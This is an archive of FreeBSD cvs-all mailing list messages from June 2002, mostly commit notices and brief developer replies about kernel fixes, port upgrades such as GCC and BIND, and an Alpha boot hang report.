+8 -1 src/etc/rc.diskless2 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 13: 6: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from srv1.cosmo-project.de (srv1.cosmo-project.de [213.83.6.106]) by hub.freebsd.org (Postfix) with ESMTP id 6791B37B405; Sat, 22 Jun 2002 13:05:44 -0700 (PDT) Received: from cicely5.cicely.de (cicely5.cicely.de [IPv6:3ffe:400:8d0:301:200:92ff:fe9b:20e7]) (authenticated bits=0) by srv1.cosmo-project.de (8.12.3/8.12.3) with ESMTP id g5MK5ZMa049416 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK); Sat, 22 Jun 2002 22:05:37 +0200 (CEST) (envelope-from ticso@cicely5.cicely.de) Received: from cicely5.cicely.de (localhost [IPv6:::1]) by cicely5.cicely.de (8.12.1/8.12.1) with ESMTP id g5MK5XFJ054849 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Sat, 22 Jun 2002 22:05:33 +0200 (CEST)?g (envelope-from ticso@cicely5.cicely.de) Received: (from ticso@localhost) by cicely5.cicely.de (8.12.1/8.12.1/Submit) id g5MK5Wcp054848; Sat, 22 Jun 2002 22:05:32 +0200 (CEST)?g (envelope-from ticso) Date: Sat, 22 Jun 2002 22:05:32 +0200 From: Bernd Walter To: Nick Hibma Cc: "cvs-committers@FreeBSD.org" , "cvs-all@FreeBSD.org" , freebsd-alpha@FreeBSD.org Subject: Re: cvs commit: src/sys/dev/sio sio.c Message-ID: <20020622200531.GE53233@cicely5.cicely.de> Reply-To: ticso@cicely.de References: <200206221633.g5MGXTH76913@freefall.freebsd.org> <20020622183404.V245-100000@heather.van-laarhoven.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020622183404.V245-100000@heather.van-laarhoven.org> X-Operating-System: FreeBSD cicely5.cicely.de 5.0-CURRENT i386 User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 06:34:50PM +0200, Nick Hibma wrote: > > My apologies to the people running alphas for leaving this broken for > two days. I am doing a cross build at the mo' to check that I haven't > fat fingered it AGAIN. > > Cheers, > > Nick. > > On Sat, 22 Jun 2002, Nick Hibma wrote: > > > n_hibma 2002/06/22 09:33:29 PDT > > > > Modified files: > > sys/dev/sio sio.c > > Log: > > Make this compile on Alpha. > > > > Revision Changes Path > > 1.376 +2 -2 src/sys/dev/sio/sio.c > > > > http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/dev/sio/sio.c?r1=1.375&r2=1.376&cvsroot=freebsd Something is still wrong. That's all I get until it hangs: (boot dka300.3.0.6.0 -flags 0) block 0 of dka300.3.0.6.0 is a valid boot block reading 15 blocks from dka300.3.0.6.0 bootstrap code read in base = 110000, image_start = 0, image_bytes = 1e00 initializing HWRPB at 2000 initializing page table at 102000 initializing machine state setting affinity to the primary CPU jumping to bootstrap code Loading /boot/loader Console: SRM firmware console VMS PAL rev: 0x1000400010538 OSF PAL rev: 0x100090002012d Switch to OSF PAL code succeeded. FreeBSD/alpha SRM disk boot, Revision 1.2 (ticso@cicely9.cicely.de, Fri Jun 21 23:50:28 CEST 2002) Memory: 65536 k Loading /boot/defaults/loader.conf /boot/kernel/kernel data=0x2800b0+0x49fb0 syms=[0x8+0x3d2a8+0x8+0x305c6] Hit [Enter] to boot immediately, or any other key for command prompt. Booting [/boot/kernel/kernel]... Entering /boot/kernel/kernel at 0xfffffc000032d860... sio1: gdb debugging port I havn't looked into that issue yet so I can't make any comments about what went wrong here. Possible it's something else. -- B.Walter COSMO-Project http://www.cosmo-project.de ticso@cicely.de Usergroup info@cosmo-project.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 13:26:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5293237B408; Sat, 22 Jun 2002 13:26:52 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MKQqP31504; Sat, 22 Jun 2002 13:26:52 -0700 (PDT) (envelope-from obrien) Message-Id: <200206222026.g5MKQqP31504@freefall.freebsd.org> From: "David E. O'Brien" Date: Sat, 22 Jun 2002 13:26:52 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/gcc31 Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/22 13:26:52 PDT Modified files: lang/gcc31 Makefile distinfo Log: Upgrade to the 17-June-2002 GCC 3.1.1 pre-release snapshot. Revision Changes Path 1.124 +5 -5 ports/lang/gcc31/Makefile 1.72 +6 -6 ports/lang/gcc31/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 13:47: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0CAA137B403; Sat, 22 Jun 2002 13:47:00 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MKl0533881; Sat, 22 Jun 2002 13:47:00 -0700 (PDT) (envelope-from mux) Message-Id: <200206222047.g5MKl0533881@freefall.freebsd.org> From: Maxime Henrion Date: Sat, 22 Jun 2002 13:46:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sparc64/sparc64 elf_machdep.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mux 2002/06/22 13:46:59 PDT Modified files: sys/sparc64/sparc64 elf_machdep.c Log: Warning fix. Reviewed by: peter Revision Changes Path 1.6 +3 -3 src/sys/sparc64/sparc64/elf_machdep.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 13:49:19 2002 Delivered-To: cvs-all@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 0769837B400; Sat, 22 Jun 2002 13:49:14 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5MKnCYm062173; Sat, 22 Jun 2002 16:49:12 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Sat, 22 Jun 2002 16:49:12 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Alan Cox Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/vm vm_mmap.c In-Reply-To: <200206221913.g5MJDuI09547@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 22 Jun 2002, Alan Cox wrote: > alc 2002/06/22 12:13:56 PDT > > Modified files: > sys/vm vm_mmap.c > Log: > o Reduce the scope of Giant in vm_mmap() to just the code that manipulates > a vnode. (Thus, MAP_ANON and MAP_STACK never acquire Giant.) Great work! Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 0:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9634237B400; Sat, 22 Jun 2002 14:00:53 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ML0rO36021; Sat, 22 Jun 2002 14:00:53 -0700 (PDT) (envelope-from brian) Message-Id: <200206222100.g5ML0rO36021@freefall.freebsd.org> From: Brian Somers Date: Sat, 22 Jun 2002 14:00:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netgraph ng_pppoe.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/22 14:00:53 PDT Modified files: sys/netgraph ng_pppoe.c Log: NUL terminate the ACNAME passed to userland. Revision Changes Path 1.53 +4 -3 src/sys/netgraph/ng_pppoe.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 1:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ED09337B400; Sat, 22 Jun 2002 14:01:23 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ML1N736126; Sat, 22 Jun 2002 14:01:23 -0700 (PDT) (envelope-from brian) Message-Id: <200206222101.g5ML1N736126@freefall.freebsd.org> From: Brian Somers Date: Sat, 22 Jun 2002 14:01:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netgraph ng_pppoe.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/22 14:01:23 PDT Modified files: (Branch: RELENG_4) sys/netgraph ng_pppoe.c Log: MFC: NUL terminate the ACNAME passed to userland. Revision Changes Path 1.23.2.14 +4 -3 src/sys/netgraph/ng_pppoe.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 1:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D41EA37B400; Sat, 22 Jun 2002 14:01:48 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ML1mf36186; Sat, 22 Jun 2002 14:01:48 -0700 (PDT) (envelope-from brian) Message-Id: <200206222101.g5ML1mf36186@freefall.freebsd.org> From: Brian Somers Date: Sat, 22 Jun 2002 14:01:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/ppp ether.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/22 14:01:48 PDT Modified files: usr.sbin/ppp ether.c Log: Don't expect NUL terminated data in all netgraph messages received. Only display message hook values we understand. Revision Changes Path 1.26 +8 -2 src/usr.sbin/ppp/ether.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 2:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8289137B400; Sat, 22 Jun 2002 14:02:18 -0700 (PDT) Received: (from brian@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ML2Iv36266; Sat, 22 Jun 2002 14:02:18 -0700 (PDT) (envelope-from brian) Message-Id: <200206222102.g5ML2Iv36266@freefall.freebsd.org> From: Brian Somers Date: Sat, 22 Jun 2002 14:02:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.sbin/ppp ether.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG brian 2002/06/22 14:02:18 PDT Modified files: (Branch: RELENG_4) usr.sbin/ppp ether.c Log: MFC: Don't expect NUL terminated data in all netgraph messages received. Only display message hook values we understand. Revision Changes Path 1.9.2.12 +8 -2 src/usr.sbin/ppp/ether.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 6: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 43F7B37B406; Sat, 22 Jun 2002 14:05:48 -0700 (PDT) Received: from mail.lan.Awfulhak.org (brian@hak.Awfulhak.org [IPv6:2001:6f8:602:1::12]) by Awfulhak.org (8.12.4/8.12.4) with SMTP id g5ML5jxq000685; Sat, 22 Jun 2002 22:05:45 +0100 (BST) (envelope-from brian@Awfulhak.org) Date: Sat, 22 Jun 2002 22:05:43 +0100 From: Brian Somers To: "Brian Somers" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/netgraph ng_pppoe.c Message-Id: <20020622220543.00a60a8d.brian@Awfulhak.org> In-Reply-To: <200206222101.g5ML1N736126@freefall.freebsd.org> References: <200206222101.g5ML1N736126@freefall.freebsd.org> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 22 Jun 2002 14:01:23 -0700 (PDT), Brian Somers wrote: > brian 2002/06/22 14:01:23 PDT > > Modified files: (Branch: RELENG_4) > sys/netgraph ng_pppoe.c > Log: > MFC: NUL terminate the ACNAME passed to userland. > > Revision Changes Path > 1.23.2.14 +4 -3 src/sys/netgraph/ng_pppoe.c This was MFC'd immediately because it's a fix developed for -stable and the patch is slightly different from the -current one anyway. -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14: 7:50 2002 Delivered-To: cvs-all@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id DDA0037B425; Sat, 22 Jun 2002 14:06:54 -0700 (PDT) Received: from mail.lan.Awfulhak.org (brian@hak.Awfulhak.org [IPv6:2001:6f8:602:1::12]) by Awfulhak.org (8.12.4/8.12.4) with SMTP id g5ML6rxq000695; Sat, 22 Jun 2002 22:06:53 +0100 (BST) (envelope-from brian@Awfulhak.org) Date: Sat, 22 Jun 2002 22:06:51 +0100 From: Brian Somers To: "Brian Somers" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.sbin/ppp ether.c Message-Id: <20020622220651.58711792.brian@Awfulhak.org> In-Reply-To: <200206222102.g5ML2Iv36266@freefall.freebsd.org> References: <200206222102.g5ML2Iv36266@freefall.freebsd.org> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 22 Jun 2002 14:02:18 -0700 (PDT), Brian Somers wrote: > brian 2002/06/22 14:02:18 PDT > > Modified files: (Branch: RELENG_4) > usr.sbin/ppp ether.c > Log: > MFC: Don't expect NUL terminated data in all netgraph messages received. > Only display message hook values we understand. > > Revision Changes Path > 1.9.2.12 +8 -2 src/usr.sbin/ppp/ether.c Ditto for this MFC - the fix is addressing problems reported in -stable. -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:16:26 2002 Delivered-To: cvs-all@freebsd.org Received: from cs.rice.edu (cs.rice.edu [128.42.1.30]) by hub.freebsd.org (Postfix) with ESMTP id D472937B401; Sat, 22 Jun 2002 14:16:21 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by cs.rice.edu (Postfix) with ESMTP id 37B7F4A9CD; Sat, 22 Jun 2002 16:16:21 -0500 (CDT) Received: by cs.rice.edu (Postfix, from userid 19572) id 52C2B4A9D0; Sat, 22 Jun 2002 16:16:20 -0500 (CDT) Date: Sat, 22 Jun 2002 16:16:20 -0500 From: Alan Cox To: Robert Watson Cc: Alan Cox , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/vm vm_mmap.c Message-ID: <20020622211620.GA11391@cs.rice.edu> References: <200206221913.g5MJDuI09547@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.28i X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, Jun 22, 2002 at 04:49:12PM -0400, Robert Watson wrote: > > On Sat, 22 Jun 2002, Alan Cox wrote: > > > alc 2002/06/22 12:13:56 PDT > > > > Modified files: > > sys/vm vm_mmap.c > > Log: > > o Reduce the scope of Giant in vm_mmap() to just the code that manipulates > > a vnode. (Thus, MAP_ANON and MAP_STACK never acquire Giant.) > > Great work! Thanks. There's still the wrapper function where mmap(2) enters the kernel and calls vm_mmap(), but that too should be rid of Giant this weekend. Alan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:23:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E05CD37B403; Sat, 22 Jun 2002 14:23:23 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLNN243809; Sat, 22 Jun 2002 14:23:23 -0700 (PDT) (envelope-from bmah) Message-Id: <200206222123.g5MLNN243809@freefall.freebsd.org> From: "Bruce A. Mah" Date: Sat, 22 Jun 2002 14:23:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/share/sgml man-refs.ent X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/22 14:23:23 PDT Modified files: share/sgml man-refs.ent Log: New manpage entities: pselect(3), disc(4), pam_echo(8), pam_exec(8). Revision Changes Path 1.146 +4 -0 doc/share/sgml/man-refs.ent To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:25: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8EBC137B400; Sat, 22 Jun 2002 14:24:58 -0700 (PDT) Received: (from mckusick@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLOw243907; Sat, 22 Jun 2002 14:24:58 -0700 (PDT) (envelope-from mckusick) Message-Id: <200206222124.g5MLOw243907@freefall.freebsd.org> From: Kirk McKusick Date: Sat, 22 Jun 2002 14:24:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ufs/ffs ffs_alloc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mckusick 2002/06/22 14:24:58 PDT Modified files: sys/ufs/ffs ffs_alloc.c Log: This patch fixes a problem whereby filesystems that ran out of inodes in a cylinder group would fail to check for free inodes in other cylinder groups. This bug was introduced in the UFS2 code merge two days ago. An inode is allocated by calling ffs_valloc which calls ffs_hashalloc to do the filesystem scan. Ffs_hashalloc walks around the cylinder groups calling its passed allocator (ffs_nodealloccg in this case) until the allocator returns a non-zero result. The bug is that ffs_hashalloc expects the passed allocator function to return a 64-bit ufs2_daddr_t. When allocating inodes, it calls ffs_nodealloccg which was returning a 32-bit ino_t. The ffs_hashalloc code checked a 64-bit return value and usually found random non-zero bits in the high 32-bits so decided that the allocation had succeeded (in this case in the only cylinder group that it checked). When the result was passed back to ffs_valloc it looked at only the bottom 32-bits, saw zero and declared the system out of inodes. But ffs_hashalloc had really only checked one cylinder group. The fix is to change ffs_nodealloccg to return 64-bit results. Sponsored by: DARPA & NAI Labs. Submitted by: Poul-Henning Kamp Reviewed by: Maxime Henrion Revision Changes Path 1.94 +2 -2 src/sys/ufs/ffs/ffs_alloc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:26:52 2002 Delivered-To: cvs-all@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 41EC237B400; Sat, 22 Jun 2002 14:26:47 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5MLQjCV090368; Sat, 22 Jun 2002 14:26:45 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5MLQjIQ090367; Sat, 22 Jun 2002 14:26:45 -0700 (PDT) (envelope-from dillon) Date: Sat, 22 Jun 2002 14:26:45 -0700 (PDT) From: Matthew Dillon Message-Id: <200206222126.g5MLQjIQ090367@apollo.backplane.com> To: Alan Cox Cc: Robert Watson , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/sys/vm vm_mmap.c References: <200206221913.g5MJDuI09547@freefall.freebsd.org> <20020622211620.GA11391@cs.rice.edu> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG :... (rwatson) ... :> :> Great work! Ditto, the progress Alan is making is incredible! I can actually *feel* the noose tightening around the VFS subsystem as the Giant is unwound from the VM system. Every time Alan makes a commit I pop another gumball out of my $5 toy gumball machine :-) -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:44:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B408B37B401; Sat, 22 Jun 2002 14:44:11 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLiBL46386; Sat, 22 Jun 2002 14:44:11 -0700 (PDT) (envelope-from mux) Message-Id: <200206222144.g5MLiBL46386@freefall.freebsd.org> From: Maxime Henrion Date: Sat, 22 Jun 2002 14:44:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern vfs_init.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mux 2002/06/22 14:44:11 PDT Modified files: sys/kern vfs_init.c Log: We don't need to check the return value of malloc() against NULL when the M_WAITOK flag is specified. Revision Changes Path 1.61 +0 -14 src/sys/kern/vfs_init.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:45:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4F37E37B401; Sat, 22 Jun 2002 14:45:27 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLjRS46536; Sat, 22 Jun 2002 14:45:27 -0700 (PDT) (envelope-from dougb) Message-Id: <200206222145.g5MLjRS46536@freefall.freebsd.org> From: Doug Barton Date: Sat, 22 Jun 2002 14:45:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/bind8 Makefile distinfo ports/net/bind8/files patch-aa patch-ab patch-port_freebsd_include_port_before.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/22 14:45:27 PDT Modified files: net/bind8 Makefile distinfo net/bind8/files patch-aa patch-ab Removed files: net/bind8/files patch-port_freebsd_include_port_before.h Log: Upgrade to 8.3.2, the lastest release from ISC. Numerous bug fixes include better EDNS support, the ability to turn EDNS probing off on a per-server basis, better TSIG support, better handling of IPv6, and various improvements to the CLI utilities like dig, host, etc. For other improvements see the CHANGES file. All users of BIND 8 are heavily encouraged to upgrade. Changes to the port: 1. My patch for gid_t handling in 5.x was included in the base. 2. Make use of the new and improved MANPREFIX handling in bsd.port.mk. 3. If the user defines REPLACE_SYSTEM_BIND, we do just that. Revision Changes Path 1.35 +15 -1 ports/net/bind8/Makefile 1.18 +2 -2 ports/net/bind8/distinfo 1.9 +4 -4 ports/net/bind8/files/patch-aa 1.5 +1 -1 ports/net/bind8/files/patch-ab 1.2 +0 -25 ports/net/bind8/files/patch-port_freebsd_include_port_before.h (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:51:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 93D2237B405; Sat, 22 Jun 2002 14:51:16 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLpGf47664; Sat, 22 Jun 2002 14:51:16 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206222151.g5MLpGf47664@freefall.freebsd.org> From: Maxim Sobolev Date: Sat, 22 Jun 2002 14:51:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/russian/koi8r-ps Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/22 14:51:16 PDT Modified files: russian/koi8r-ps Makefile pkg-plist Log: - Make fetchable; - sort pkg-plist. Revision Changes Path 1.13 +2 -1 ports/russian/koi8r-ps/Makefile 1.2 +18 -18 ports/russian/koi8r-ps/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 14:52:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F0CD637B405; Sat, 22 Jun 2002 14:52:42 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MLqgj47822; Sat, 22 Jun 2002 14:52:42 -0700 (PDT) (envelope-from bmah) Message-Id: <200206222152.g5MLqgj47822@freefall.freebsd.org> From: "Bruce A. Mah" Date: Sat, 22 Jun 2002 14:52:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/22 14:52:42 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: New release notes: MCA support on ia64, rp(4) update (+MFC), tx(4) multicast filtering, ahd driver, calendar(1) 